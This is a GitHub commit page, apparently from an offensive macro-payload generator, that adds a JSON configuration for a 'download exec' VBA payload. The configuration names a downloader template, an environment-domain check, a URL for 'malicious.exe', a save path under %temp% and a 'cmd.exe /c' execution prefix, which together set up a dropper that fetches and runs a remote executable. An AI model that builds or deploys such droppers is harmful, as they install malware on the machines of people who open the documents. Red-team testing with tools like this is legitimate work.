Add files via upload

patch-1
Mr-Un1k0d3r 2016-09-23 14:45:02 -04:00 committed by GitHub
parent c1f97515ba
commit 98b395f0ee
1 changed files with 13 additions and 0 deletions

View File

@ -0,0 +1,13 @@
{
"description": "Generic download exec payload including domain check",
"comment": "File is saved at the following path %temp%\\PATH.",
"template": "../template/downloader.vba",
"varcount": 80,
"encodingoffset": 4,
"encodedvars": {
"DOMAIN": "RINGZER0",
"URL": "http://127.0.0.1/malicious.exe",
"PATH": "malicious.exe"
},
"payload": "cmd.exe /c "
}